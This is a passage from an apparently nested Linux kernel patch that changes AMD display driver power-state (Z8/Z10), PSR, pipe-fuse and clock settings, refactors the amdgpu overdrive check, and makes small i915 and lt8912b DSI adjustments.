+ 	struct dc_context *ctx = hws->ctx;
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_hwseq.h b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_hwseq.h
+index c419d3dbdfee6..c786d5e6a428e 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_hwseq.h
++++ b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_hwseq.h
+@@ -43,4 +43,6 @@ void dcn314_set_pixels_per_cycle(struct pipe_ctx *pipe_ctx);
+ 
+ void dcn314_hubp_pg_control(struct dce_hwseq *hws, unsigned int hubp_inst, bool power_on);
+ 
++void dcn314_dpp_root_clock_control(struct dce_hwseq *hws, unsigned int dpp_inst, bool clock_on);
++
+ #endif /* __DC_HWSS_DCN314_H__ */
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_init.c b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_init.c
+index 343f4d9dd5e34..5267e901a35c1 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_init.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_init.c
+@@ -137,6 +137,7 @@ static const struct hwseq_private_funcs dcn314_private_funcs = {
+ 	.plane_atomic_disable = dcn20_plane_atomic_disable,
+ 	.plane_atomic_power_down = dcn10_plane_atomic_power_down,
+ 	.enable_power_gating_plane = dcn314_enable_power_gating_plane,
++	.dpp_root_clock_control = dcn314_dpp_root_clock_control,
+ 	.hubp_pg_control = dcn314_hubp_pg_control,
+ 	.program_all_writeback_pipes_in_tree = dcn30_program_all_writeback_pipes_in_tree,
+ 	.update_odm = dcn314_update_odm,
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_resource.c b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_resource.c
+index ffaa4e5b3fca0..b7782433ce6ba 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_resource.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_resource.c
+@@ -884,6 +884,8 @@ static const struct dc_plane_cap plane_cap = {
+ static const struct dc_debug_options debug_defaults_drv = {
+ 	.disable_z10 = false,
+ 	.enable_z9_disable_interface = true,
++	.minimum_z8_residency_time = 2000,
++	.psr_skip_crtc_disable = true,
+ 	.disable_dmcu = true,
+ 	.force_abm_enable = false,
+ 	.timing_trace = false,
+@@ -940,6 +942,10 @@ static const struct dc_debug_options debug_defaults_diags = {
+ };
+ 
+ static const struct dc_panel_config panel_config_defaults = {
++	.psr = {
++		.disable_psr = false,
++		.disallow_psrsu = false,
++	},
+ 	.ilr = {
+ 		.optimize_edp_link_rate = true,
+ 	},
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn315/dcn315_resource.c b/drivers/gpu/drm/amd/display/dc/dcn315/dcn315_resource.c
+index 58746c437554f..31cbc5762eab3 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn315/dcn315_resource.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn315/dcn315_resource.c
+@@ -907,6 +907,10 @@ static const struct dc_debug_options debug_defaults_diags = {
+ };
+ 
+ static const struct dc_panel_config panel_config_defaults = {
++	.psr = {
++		.disable_psr = false,
++		.disallow_psrsu = false,
++	},
+ 	.ilr = {
+ 		.optimize_edp_link_rate = true,
+ 	},
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn316/dcn316_resource.c b/drivers/gpu/drm/amd/display/dc/dcn316/dcn316_resource.c
+index 6b40a11ac83a9..af3eddc0cf32e 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn316/dcn316_resource.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn316/dcn316_resource.c
+@@ -906,6 +906,10 @@ static const struct dc_debug_options debug_defaults_diags = {
+ };
+ 
+ static const struct dc_panel_config panel_config_defaults = {
++	.psr = {
++		.disable_psr = false,
++		.disallow_psrsu = false,
++	},
+ 	.ilr = {
+ 		.optimize_edp_link_rate = true,
+ 	},
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_hwseq.c b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_hwseq.c
+index 1a85509c12f23..e9188bce62e0b 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_hwseq.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_hwseq.c
+@@ -984,6 +984,7 @@ void dcn32_init_hw(struct dc *dc)
+ 	if (dc->ctx->dmub_srv) {
+ 		dc_dmub_srv_query_caps_cmd(dc->ctx->dmub_srv->dmub);
+ 		dc->caps.dmub_caps.psr = dc->ctx->dmub_srv->dmub->feature_caps.psr;
++		dc->caps.dmub_caps.mclk_sw = dc->ctx->dmub_srv->dmub->feature_caps.fw_assisted_mclk_switch;
+ 	}
+ 
+ 	/* Enable support for ODM and windowed MPO if policy flag is set */
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.c b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.c
+index a942e2812183a..814620e6638fd 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.c
+@@ -1984,7 +1984,7 @@ int dcn32_populate_dml_pipes_from_context(
+ 	// In general cases we want to keep the dram clock change requirement
+ 	// (prefer configs that support MCLK switch). Only override to false
+ 	// for SubVP
+-	if (subvp_in_use)
++	if (context->bw_ctx.bw.dcn.clk.fw_based_mclk_switching || subvp_in_use)
+ 		context->bw_ctx.dml.soc.dram_clock_change_requirement_final = false;
+ 	else
+ 		context->bw_ctx.dml.soc.dram_clock_change_requirement_final = true;
+@@ -2037,6 +2037,14 @@ static struct resource_funcs dcn32_res_pool_funcs = {
+ 	.remove_phantom_pipes = dcn32_remove_phantom_pipes,
+ };
+ 
++static uint32_t read_pipe_fuses(struct dc_context *ctx)
++{
++	uint32_t value = REG_READ(CC_DC_PIPE_DIS);
++	/* DCN32 support max 4 pipes */
++	value = value & 0xf;
++	return value;
++}
++
+ 
+ static bool dcn32_resource_construct(
+ 	uint8_t num_virtual_links,
+@@ -2079,7 +2087,7 @@ static bool dcn32_resource_construct(
+ 	pool->base.res_cap = &res_cap_dcn32;
+ 	/* max number of pipes for ASIC before checking for pipe fuses */
+ 	num_pipes  = pool->base.res_cap->num_timing_generator;
+-	pipe_fuses = REG_READ(CC_DC_PIPE_DIS);
++	pipe_fuses = read_pipe_fuses(ctx);
+ 
+ 	for (i = 0; i < pool->base.res_cap->num_timing_generator; i++)
+ 		if (pipe_fuses & 1 << i)
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn321/dcn321_resource.c b/drivers/gpu/drm/amd/display/dc/dcn321/dcn321_resource.c
+index d320e21680da1..213ff3672bd54 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn321/dcn321_resource.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn321/dcn321_resource.c
+@@ -1621,6 +1621,14 @@ static struct resource_funcs dcn321_res_pool_funcs = {
+ 	.remove_phantom_pipes = dcn32_remove_phantom_pipes,
+ };
+ 
++static uint32_t read_pipe_fuses(struct dc_context *ctx)
++{
++	uint32_t value = REG_READ(CC_DC_PIPE_DIS);
++	/* DCN321 support max 4 pipes */
++	value = value & 0xf;
++	return value;
++}
++
+ 
+ static bool dcn321_resource_construct(
+ 	uint8_t num_virtual_links,
+@@ -1663,7 +1671,7 @@ static bool dcn321_resource_construct(
+ 	pool->base.res_cap = &res_cap_dcn321;
+ 	/* max number of pipes for ASIC before checking for pipe fuses */
+ 	num_pipes  = pool->base.res_cap->num_timing_generator;
+-	pipe_fuses = REG_READ(CC_DC_PIPE_DIS);
++	pipe_fuses = read_pipe_fuses(ctx);
+ 
+ 	for (i = 0; i < pool->base.res_cap->num_timing_generator; i++)
+ 		if (pipe_fuses & 1 << i)
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn20/dcn20_fpu.c b/drivers/gpu/drm/amd/display/dc/dml/dcn20/dcn20_fpu.c
+index 45db40c41882c..186538e3e3c0c 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn20/dcn20_fpu.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn20/dcn20_fpu.c
+@@ -963,6 +963,8 @@ static enum dcn_zstate_support_state  decide_zstate_support(struct dc *dc, struc
+ 	 * 	2. single eDP, on link 0, 1 plane and stutter period > 5ms
+ 	 * Z10 only cases:
+ 	 * 	1. single eDP, on link 0, 1 plane and stutter period >= 5ms
++	 * Z8 cases:
++	 * 	1. stutter period sufficient
+ 	 * Zstate not allowed cases:
+ 	 * 	1. Everything else
+ 	 */
+@@ -971,6 +973,9 @@ static enum dcn_zstate_support_state  decide_zstate_support(struct dc *dc, struc
+ 	else if (context->stream_count == 1 &&  context->streams[0]->signal == SIGNAL_TYPE_EDP) {
+ 		struct dc_link *link = context->streams[0]->sink->link;
+ 		struct dc_stream_status *stream_status = &context->stream_status[0];
++		int minmum_z8_residency = dc->debug.minimum_z8_residency_time > 0 ? dc->debug.minimum_z8_residency_time : 1000;
++		bool allow_z8 = context->bw_ctx.dml.vba.StutterPeriod > (double)minmum_z8_residency;
++		bool is_pwrseq0 = link->link_index == 0;
+ 
+ 		if (dc_extended_blank_supported(dc)) {
+ 			for (i = 0; i < dc->res_pool->pipe_count; i++) {
+@@ -983,18 +988,20 @@ static enum dcn_zstate_support_state  decide_zstate_support(struct dc *dc, struc
+ 				}
+ 			}
+ 		}
+-		/* zstate only supported on PWRSEQ0  and when there's <2 planes*/
+-		if (link->link_index != 0 || stream_status->plane_count > 1)
++
++		/* Don't support multi-plane configurations */
++		if (stream_status->plane_count > 1)
+ 			return DCN_ZSTATE_SUPPORT_DISALLOW;
+ 
+-		if (context->bw_ctx.dml.vba.StutterPeriod > 5000.0 || optimized_min_dst_y_next_start_us > 5000)
++		if (is_pwrseq0 && (context->bw_ctx.dml.vba.StutterPeriod > 5000.0 || optimized_min_dst_y_next_start_us > 5000))
+ 			return DCN_ZSTATE_SUPPORT_ALLOW;
+-		else if (link->psr_settings.psr_version == DC_PSR_VERSION_1 && !dc->debug.disable_psr)
+-			return DCN_ZSTATE_SUPPORT_ALLOW_Z10_ONLY;
++		else if (is_pwrseq0 && link->psr_settings.psr_version == DC_PSR_VERSION_1 && !link->panel_config.psr.disable_psr)
++			return allow_z8 ? DCN_ZSTATE_SUPPORT_ALLOW_Z8_Z10_ONLY : DCN_ZSTATE_SUPPORT_ALLOW_Z10_ONLY;
+ 		else
+-			return DCN_ZSTATE_SUPPORT_DISALLOW;
+-	} else
++			return allow_z8 ? DCN_ZSTATE_SUPPORT_ALLOW_Z8_ONLY : DCN_ZSTATE_SUPPORT_DISALLOW;
++	} else {
+ 		return DCN_ZSTATE_SUPPORT_DISALLOW;
++	}
+ }
+ 
+ void dcn20_calculate_dlg_params(
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn30/dcn30_fpu.c b/drivers/gpu/drm/amd/display/dc/dml/dcn30/dcn30_fpu.c
+index 990dbd736e2ce..fdfb19337ea6e 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn30/dcn30_fpu.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn30/dcn30_fpu.c
+@@ -368,7 +368,9 @@ void dcn30_fpu_update_soc_for_wm_a(struct dc *dc, struct dc_state *context)
+ 	dc_assert_fp_enabled();
+ 
+ 	if (dc->clk_mgr->bw_params->wm_table.nv_entries[WM_A].valid) {
+-		context->bw_ctx.dml.soc.dram_clock_change_latency_us = dc->clk_mgr->bw_params->wm_table.nv_entries[WM_A].dml_input.pstate_latency_us;
++		if (!context->bw_ctx.bw.dcn.clk.fw_based_mclk_switching ||
++				context->bw_ctx.dml.soc.dram_clock_change_latency_us == 0)
++			context->bw_ctx.dml.soc.dram_clock_change_latency_us = dc->clk_mgr->bw_params->wm_table.nv_entries[WM_A].dml_input.pstate_latency_us;
+ 		context->bw_ctx.dml.soc.sr_enter_plus_exit_time_us = dc->clk_mgr->bw_params->wm_table.nv_entries[WM_A].dml_input.sr_enter_plus_exit_time_us;
+ 		context->bw_ctx.dml.soc.sr_exit_time_us = dc->clk_mgr->bw_params->wm_table.nv_entries[WM_A].dml_input.sr_exit_time_us;
+ 	}
+@@ -520,9 +522,21 @@ void dcn30_fpu_calculate_wm_and_dlg(
+ 		pipe_idx++;
+ 	}
+ 
+-	DC_FP_START();
++	// WA: restrict FPO to use first non-strobe mode (NV24 BW issue)
++	if (context->bw_ctx.bw.dcn.clk.fw_based_mclk_switching &&
++			dc->dml.soc.num_chans <= 4 &&
++			context->bw_ctx.dml.vba.DRAMSpeed <= 1700 &&
++			context->bw_ctx.dml.vba.DRAMSpeed >= 1500) {
++
++		for (i = 0; i < dc->dml.soc.num_states; i++) {
++			if (dc->dml.soc.clock_limits[i].dram_speed_mts > 1700) {
++				context->bw_ctx.dml.vba.DRAMSpeed = dc->dml.soc.clock_limits[i].dram_speed_mts;
++				break;
++			}
++		}
++	}
++
+ 	dcn20_calculate_dlg_params(dc, context, pipes, pipe_cnt, vlevel);
+-	DC_FP_END();
+ 
+ 	if (!pstate_en)
+ 		/* Restore full p-state latency */
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn314/dcn314_fpu.c b/drivers/gpu/drm/amd/display/dc/dml/dcn314/dcn314_fpu.c
+index 34b6c763a4554..4f91e64754239 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn314/dcn314_fpu.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn314/dcn314_fpu.c
+@@ -148,8 +148,8 @@ struct _vcs_dpi_soc_bounding_box_st dcn3_14_soc = {
+ 	.num_states = 5,
+ 	.sr_exit_time_us = 16.5,
+ 	.sr_enter_plus_exit_time_us = 18.5,
+-	.sr_exit_z8_time_us = 442.0,
+-	.sr_enter_plus_exit_z8_time_us = 560.0,
++	.sr_exit_z8_time_us = 268.0,
++	.sr_enter_plus_exit_z8_time_us = 393.0,
+ 	.writeback_latency_us = 12.0,
+ 	.dram_channel_width_bytes = 4,
+ 	.round_trip_ping_latency_dcfclk_cycles = 106,
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn32/dcn32_fpu.c b/drivers/gpu/drm/amd/display/dc/dml/dcn32/dcn32_fpu.c
+index e22b4b3880af9..d2b184fdd7e02 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn32/dcn32_fpu.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn32/dcn32_fpu.c
+@@ -1200,9 +1200,7 @@ static void dcn32_full_validate_bw_helper(struct dc *dc,
+ 			}
+ 		} else {
+ 			// Most populate phantom DLG params before programming hardware / timing for phantom pipe
+-			DC_FP_START();
+ 			dcn32_helper_populate_phantom_dlg_params(dc, context, pipes, *pipe_cnt);
+-			DC_FP_END();
+ 
+ 			/* Call validate_apply_pipe_split flags after calling DML getters for
+ 			 * phantom dlg params, or some of the VBA params indicating pipe split
+@@ -1503,11 +1501,8 @@ bool dcn32_internal_validate_bw(struct dc *dc,
+ 
+ 	dml_log_pipe_params(&context->bw_ctx.dml, pipes, pipe_cnt);
+ 
+-	if (!fast_validate) {
+-		DC_FP_START();
++	if (!fast_validate)
+ 		dcn32_full_validate_bw_helper(dc, context, pipes, &vlevel, split, merge, &pipe_cnt);
+-		DC_FP_END();
+-	}
+ 
+ 	if (fast_validate ||
+ 			(dc->debug.dml_disallow_alternate_prefetch_modes &&
+@@ -2172,9 +2167,7 @@ static int build_synthetic_soc_states(struct clk_bw_params *bw_params,
+ 		entry.fabricclk_mhz = 0;
+ 		entry.dram_speed_mts = 0;
+ 
+-		DC_FP_START();
+ 		insert_entry_into_table_sorted(table, num_entries, &entry);
+-		DC_FP_END();
+ 	}
+ 
+ 	// Insert the max DCFCLK
+@@ -2182,9 +2175,7 @@ static int build_synthetic_soc_states(struct clk_bw_params *bw_params,
+ 	entry.fabricclk_mhz = 0;
+ 	entry.dram_speed_mts = 0;
+ 
+-	DC_FP_START();
+ 	insert_entry_into_table_sorted(table, num_entries, &entry);
+-	DC_FP_END();
+ 
+ 	// Insert the UCLK DPMS
+ 	for (i = 0; i < num_uclk_dpms; i++) {
+@@ -2192,9 +2183,7 @@ static int build_synthetic_soc_states(struct clk_bw_params *bw_params,
+ 		entry.fabricclk_mhz = 0;
+ 		entry.dram_speed_mts = bw_params->clk_table.entries[i].memclk_mhz * 16;
+ 
+-		DC_FP_START();
+ 		insert_entry_into_table_sorted(table, num_entries, &entry);
+-		DC_FP_END();
+ 	}
+ 
+ 	// If FCLK is coarse grained, insert individual DPMs.
+@@ -2204,9 +2193,7 @@ static int build_synthetic_soc_states(struct clk_bw_params *bw_params,
+ 			entry.fabricclk_mhz = bw_params->clk_table.entries[i].fclk_mhz;
+ 			entry.dram_speed_mts = 0;
+ 
+-			DC_FP_START();
+ 			insert_entry_into_table_sorted(table, num_entries, &entry);
+-			DC_FP_END();
+ 		}
+ 	}
+ 	// If FCLK fine grained, only insert max
+@@ -2215,9 +2202,7 @@ static int build_synthetic_soc_states(struct clk_bw_params *bw_params,
+ 		entry.fabricclk_mhz = max_fclk_mhz;
+ 		entry.dram_speed_mts = 0;
+ 
+-		DC_FP_START();
+ 		insert_entry_into_table_sorted(table, num_entries, &entry);
+-		DC_FP_END();
+ 	}
+ 
+ 	// At this point, the table contains all "points of interest" based on
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_32.c b/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_32.c
+index 820042f6aaca5..e02e9d4b04a95 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_32.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_32.c
+@@ -807,7 +807,8 @@ static void DISPCLKDPPCLKDCFCLKDeepSleepPrefetchParametersWatermarksAndPerforman
+ 					v->SwathHeightY[k],
+ 					v->SwathHeightC[k],
+ 					TWait,
+-					v->DRAMSpeedPerState[mode_lib->vba.VoltageLevel] <= MEM_STROBE_FREQ_MHZ ?
++					(v->DRAMSpeedPerState[mode_lib->vba.VoltageLevel] <= MEM_STROBE_FREQ_MHZ ||
++						v->DCFCLKPerState[mode_lib->vba.VoltageLevel] <= MIN_DCFCLK_FREQ_MHZ) ?
+ 							mode_lib->vba.ip.min_prefetch_in_strobe_us : 0,
+ 					/* Output */
+ 					&v->DSTXAfterScaler[k],
+@@ -3288,7 +3289,7 @@ void dml32_ModeSupportAndSystemConfigurationFull(struct display_mode_lib *mode_l
+ 							v->swath_width_chroma_ub_this_state[k],
+ 							v->SwathHeightYThisState[k],
+ 							v->SwathHeightCThisState[k], v->TWait,
+-							v->DRAMSpeedPerState[i] <= MEM_STROBE_FREQ_MHZ ?
++							(v->DRAMSpeedPerState[i] <= MEM_STROBE_FREQ_MHZ || v->DCFCLKState[i][j] <= MIN_DCFCLK_FREQ_MHZ) ?
+ 									mode_lib->vba.ip.min_prefetch_in_strobe_us : 0,
+ 
+ 							/* Output */
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_32.h b/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_32.h
+index c8b28c83ddf48..e92eee2c664d0 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_32.h
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_32.h
+@@ -52,6 +52,7 @@
+ #define BPP_BLENDED_PIPE 0xffffffff
+ 
+ #define MEM_STROBE_FREQ_MHZ 1600
++#define MIN_DCFCLK_FREQ_MHZ 200
+ #define MEM_STROBE_MAX_DELIVERY_TIME_US 60.0
+ 
+ struct display_mode_lib;
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn321/dcn321_fpu.c b/drivers/gpu/drm/amd/display/dc/dml/dcn321/dcn321_fpu.c
+index b80cef70fa60f..383a409a3f54c 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn321/dcn321_fpu.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn321/dcn321_fpu.c
+@@ -106,16 +106,16 @@ struct _vcs_dpi_soc_bounding_box_st dcn3_21_soc = {
+ 	.clock_limits = {
+ 		{
+ 			.state = 0,
+-			.dcfclk_mhz = 1564.0,
+-			.fabricclk_mhz = 400.0,
+-			.dispclk_mhz = 2150.0,
+-			.dppclk_mhz = 2150.0,
++			.dcfclk_mhz = 1434.0,
++			.fabricclk_mhz = 2250.0,
++			.dispclk_mhz = 1720.0,
++			.dppclk_mhz = 1720.0,
+ 			.phyclk_mhz = 810.0,
+ 			.phyclk_d18_mhz = 667.0,
+-			.phyclk_d32_mhz = 625.0,
++			.phyclk_d32_mhz = 313.0,
+ 			.socclk_mhz = 1200.0,
+-			.dscclk_mhz = 716.667,
+-			.dram_speed_mts = 1600.0,
++			.dscclk_mhz = 573.333,
++			.dram_speed_mts = 16000.0,
+ 			.dtbclk_mhz = 1564.0,
+ 		},
+ 	},
+@@ -125,14 +125,14 @@ struct _vcs_dpi_soc_bounding_box_st dcn3_21_soc = {
+ 	.sr_exit_z8_time_us = 285.0,
+ 	.sr_enter_plus_exit_z8_time_us = 320,
+ 	.writeback_latency_us = 12.0,
+-	.round_trip_ping_latency_dcfclk_cycles = 263,
++	.round_trip_ping_latency_dcfclk_cycles = 207,
+ 	.urgent_latency_pixel_data_only_us = 4,
+ 	.urgent_latency_pixel_mixed_with_vm_data_us = 4,
+ 	.urgent_latency_vm_data_only_us = 4,
+-	.fclk_change_latency_us = 20,
+-	.usr_retraining_latency_us = 2,
+-	.smn_latency_us = 2,
+-	.mall_allocated_for_dcn_mbytes = 64,
++	.fclk_change_latency_us = 7,
++	.usr_retraining_latency_us = 0,
++	.smn_latency_us = 0,
++	.mall_allocated_for_dcn_mbytes = 32,
+ 	.urgent_out_of_order_return_per_channel_pixel_only_bytes = 4096,
+ 	.urgent_out_of_order_return_per_channel_pixel_and_vm_bytes = 4096,
+ 	.urgent_out_of_order_return_per_channel_vm_only_bytes = 4096,
+diff --git a/drivers/gpu/drm/amd/display/dc/inc/hw/dccg.h b/drivers/gpu/drm/amd/display/dc/inc/hw/dccg.h
+index ce006762f2571..ad6acd1b34e1d 100644
+--- a/drivers/gpu/drm/amd/display/dc/inc/hw/dccg.h
++++ b/drivers/gpu/drm/amd/display/dc/inc/hw/dccg.h
+@@ -148,18 +148,21 @@ struct dccg_funcs {
+ 		struct dccg *dccg,
+ 		int inst);
+ 
+-void (*set_pixel_rate_div)(
+-        struct dccg *dccg,
+-        uint32_t otg_inst,
+-        enum pixel_rate_div k1,
+-        enum pixel_rate_div k2);
+-
+-void (*set_valid_pixel_rate)(
+-        struct dccg *dccg,
+-	int ref_dtbclk_khz,
+-        int otg_inst,
+-        int pixclk_khz);
++	void (*set_pixel_rate_div)(struct dccg *dccg,
++			uint32_t otg_inst,
++			enum pixel_rate_div k1,
++			enum pixel_rate_div k2);
+ 
++	void (*set_valid_pixel_rate)(
++			struct dccg *dccg,
++			int ref_dtbclk_khz,
++			int otg_inst,
++			int pixclk_khz);
++
++	void (*dpp_root_clock_control)(
++			struct dccg *dccg,
++			unsigned int dpp_inst,
++			bool clock_on);
+ };
+ 
+ #endif //__DAL_DCCG_H__
+diff --git a/drivers/gpu/drm/amd/display/dc/inc/hw_sequencer_private.h b/drivers/gpu/drm/amd/display/dc/inc/hw_sequencer_private.h
+index a4d61bb724b67..39bd53b790201 100644
+--- a/drivers/gpu/drm/amd/display/dc/inc/hw_sequencer_private.h
++++ b/drivers/gpu/drm/amd/display/dc/inc/hw_sequencer_private.h
+@@ -115,6 +115,10 @@ struct hwseq_private_funcs {
+ 	void (*plane_atomic_disable)(struct dc *dc, struct pipe_ctx *pipe_ctx);
+ 	void (*enable_power_gating_plane)(struct dce_hwseq *hws,
+ 		bool enable);
++	void (*dpp_root_clock_control)(
++			struct dce_hwseq *hws,
++			unsigned int dpp_inst,
++			bool clock_on);
+ 	void (*dpp_pg_control)(struct dce_hwseq *hws,
+ 			unsigned int dpp_inst,
+ 			bool power_on);
+diff --git a/drivers/gpu/drm/amd/display/dmub/src/dmub_dcn32.c b/drivers/gpu/drm/amd/display/dmub/src/dmub_dcn32.c
+index a76da0131addd..9c20516be066c 100644
+--- a/drivers/gpu/drm/amd/display/dmub/src/dmub_dcn32.c
++++ b/drivers/gpu/drm/amd/display/dmub/src/dmub_dcn32.c
+@@ -130,12 +130,13 @@ void dmub_dcn32_reset(struct dmub_srv *dmub)
+ 	REG_WRITE(DMCUB_INBOX1_WPTR, 0);
+ 	REG_WRITE(DMCUB_OUTBOX1_RPTR, 0);
+ 	REG_WRITE(DMCUB_OUTBOX1_WPTR, 0);
++	REG_WRITE(DMCUB_OUTBOX0_RPTR, 0);
++	REG_WRITE(DMCUB_OUTBOX0_WPTR, 0);
+ 	REG_WRITE(DMCUB_SCRATCH0, 0);
+ }
+ 
+ void dmub_dcn32_reset_release(struct dmub_srv *dmub)
+ {
+-	REG_WRITE(DMCUB_GPINT_DATAIN1, 0);
+ 	REG_UPDATE(MMHUBBUB_SOFT_RESET, DMUIF_SOFT_RESET, 0);
+ 	REG_WRITE(DMCUB_SCRATCH15, dmub->psp_version & 0x001100FF);
+ 	REG_UPDATE_2(DMCUB_CNTL, DMCUB_ENABLE, 1, DMCUB_TRACEPORT_EN, 1);
+diff --git a/drivers/gpu/drm/amd/pm/amdgpu_dpm.c b/drivers/gpu/drm/amd/pm/amdgpu_dpm.c
+index 1b300c569faf5..69b51612c39a5 100644
+--- a/drivers/gpu/drm/amd/pm/amdgpu_dpm.c
++++ b/drivers/gpu/drm/amd/pm/amdgpu_dpm.c
+@@ -36,6 +36,8 @@
+ #define amdgpu_dpm_enable_bapm(adev, e) \
+ 		((adev)->powerplay.pp_funcs->enable_bapm((adev)->powerplay.pp_handle, (e)))
+ 
++#define amdgpu_dpm_is_legacy_dpm(adev) ((adev)->powerplay.pp_handle == (adev))
++
+ int amdgpu_dpm_get_sclk(struct amdgpu_device *adev, bool low)
+ {
+ 	const struct amd_pm_funcs *pp_funcs = adev->powerplay.pp_funcs;
+@@ -1414,15 +1416,24 @@ int amdgpu_dpm_get_smu_prv_buf_details(struct amdgpu_device *adev,
+ 
+ int amdgpu_dpm_is_overdrive_supported(struct amdgpu_device *adev)
+ {
+-	struct pp_hwmgr *hwmgr = adev->powerplay.pp_handle;
+-	struct smu_context *smu = adev->powerplay.pp_handle;
++	if (is_support_sw_smu(adev)) {
++		struct smu_context *smu = adev->powerplay.pp_handle;
+ 
+-	if ((is_support_sw_smu(adev) && smu->od_enabled) ||
+-	    (is_support_sw_smu(adev) && smu->is_apu) ||
+-		(!is_support_sw_smu(adev) && hwmgr->od_enabled))
+-		return true;
++		return (smu->od_enabled || smu->is_apu);
++	} else {
++		struct pp_hwmgr *hwmgr;
+ 
+-	return false;
++		/*
++		 * dpm on some legacy asics don't carry od_enabled member
++		 * as its pp_handle is casted directly from adev.
++		 */
++		if (amdgpu_dpm_is_legacy_dpm(adev))
++			return false;
++
++		hwmgr = (struct pp_hwmgr *)adev->powerplay.pp_handle;
++
++		return hwmgr->od_enabled;
++	}
+ }
+ 
+ int amdgpu_dpm_set_pp_table(struct amdgpu_device *adev,
+diff --git a/drivers/gpu/drm/bridge/lontium-lt8912b.c b/drivers/gpu/drm/bridge/lontium-lt8912b.c
+index 1b74a913f1b8f..5e419934d2a39 100644
+--- a/drivers/gpu/drm/bridge/lontium-lt8912b.c
++++ b/drivers/gpu/drm/bridge/lontium-lt8912b.c
+@@ -504,7 +504,6 @@ static int lt8912_attach_dsi(struct lt8912 *lt)
+ 	dsi->format = MIPI_DSI_FMT_RGB888;
+ 
+ 	dsi->mode_flags = MIPI_DSI_MODE_VIDEO |
+-			  MIPI_DSI_MODE_VIDEO_BURST |
+ 			  MIPI_DSI_MODE_LPM |
+ 			  MIPI_DSI_MODE_NO_EOT_PACKET;
+ 
+diff --git a/drivers/gpu/drm/i915/display/icl_dsi.c b/drivers/gpu/drm/i915/display/icl_dsi.c
+index dd64b93c78e55..8219310025de5 100644
+--- a/drivers/gpu/drm/i915/display/icl_dsi.c
++++ b/drivers/gpu/drm/i915/display/icl_dsi.c
+@@ -1210,7 +1210,7 @@ static void gen11_dsi_powerup_panel(struct intel_encoder *encoder)
+ 
+ 	/* panel power on related mipi dsi vbt sequences */
+ 	intel_dsi_vbt_exec_sequence(intel_dsi, MIPI_SEQ_POWER_ON);
+-	intel_dsi_msleep(intel_dsi, intel_dsi->panel_on_delay);
++	msleep(intel_dsi->panel_on_delay);
+ 	intel_dsi_vbt_exec_sequence(intel_dsi, MIPI_SEQ_DEASSERT_RESET);
+ 	intel_dsi_vbt_exec_sequence(intel_dsi, MIPI_SEQ_INIT_OTP);
+ 	intel_dsi_vbt_exec_sequence(intel_dsi, MIPI_SEQ_DISPLAY_ON);
+diff --git a/drivers/gpu/drm/i915/display/intel_dsi_vbt.c b/drivers/gpu/drm/i915/display/intel_dsi_vbt.c
+index 2cbc1292ab382..f102c13cb9590 100644
+--- a/drivers/gpu/drm/i915/display/intel_dsi_vbt.c
++++ b/drivers/gpu/drm/i915/display/intel_dsi_vbt.c
+@@ -762,17 +762,6 @@ void intel_dsi_vbt_exec_sequence(struct intel_dsi *intel_dsi,
+ 		gpiod_set_value_cansleep(intel_dsi->gpio_backlight, 0);
+ }
+ 
+-void intel_dsi_msleep(struct intel_dsi *intel_dsi, int msec)
+-{
+-	struct intel_connector *connector = intel_dsi->attached_connector;
+-
+-	/* For v3 VBTs in vid-mode the delays are part of the VBT sequences */
